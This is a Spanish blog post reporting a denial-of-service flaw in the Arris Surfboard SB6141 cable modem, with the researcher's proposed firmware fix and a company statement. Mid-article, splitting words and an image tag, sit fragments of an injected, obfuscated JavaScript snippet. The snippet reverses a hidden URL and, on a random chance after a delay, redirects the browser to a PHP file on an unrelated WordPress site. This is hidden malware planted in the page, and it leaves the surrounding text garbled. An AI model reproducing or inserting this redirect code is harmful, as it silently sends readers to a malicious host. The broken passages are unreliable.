Millones de hogares expuestos a ataques de DDoS
Cerca de 135 millones de dispositivos modem de Estados Unidos están expuestos a ataques de tipo denegación de servicio (DDoS). Así lo ha hecho saber un investigador en seguridad que afirma que la vulnerabilidad permite a un atacante echar abajo la conexión a la red hasta que el propietario llame al proveedor para restaurar los ajustes de conexión de su modem.
La vulnerabilidad ha sido encontrada en un modem que actualmente es utilizado en millones de hogares de Estados Unidos, permitiendo a un atacante con acceso a la red, resetear el dispositivo de forma remota, lo que elimina la configuración del proveedor de servicio y causa un ataque de denegación de servicio. Cada dispositivo de la red perderá el acceso a Internet hasta que el dueño del modem se ponga en contacto con su proveedor y vuela a restaurar la configuración que tenía de fábrica.
El problema afecta en concreto a los usuarios del modem Arris Surfboard SB6141, propiedad en su día de Motorola, y podría estar afectando a más de 135 millones de personas. Un portavoz de la compañía Arris destaca que la cifra de afectados no es tan elevada. Este modelo en concreto ha sido enviado a los clientes de servicios de Comcast, Time Warner Cable, y Charter entre otros, lo que hace pensar que la cifra de afectados es elevada.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>torola-surfboard-sb6141.jpg” alt=”” width=”657″ height=”369″ /></p>
<p>El investigador de seguridad David Longenecker, quien encontró la vulnerabilidad, publicó una lista completa de los efec<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tos que puede causar el agujero de seguridad. El fallo se remonta al menos ocho años atrás, antes incluso de la adquisición de redes de la unidad de redes de Motorola por parte de Arris.
La solución más sencilla, según destaca el investigador, pasaría por desarrollar una actualización del firmware que manera que la interfaz web requiera de un nombre de usuario y contraseña antes de permitir la ejecución de acciones tales como reiniciar o restablecer los ajustes del modem. También el dispositivo debería tener en cuenta que la solicitud se originó a partir de la aplicación de gestión del equipo, y no permitir que proceda de una fuente externa.
El portavoz de la compañía ya ha aclarado que están trabajando con los clientes y proveedores de servicios para informar a los suscriptores y ofrecerles la mejor solución. En cualquier caso, “no hay riesgo de acceso a los datos”, puntualizan desde la compañía Arris.
Ver información original al respecto en Fuente:
tos-a-ataques-de-dos
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.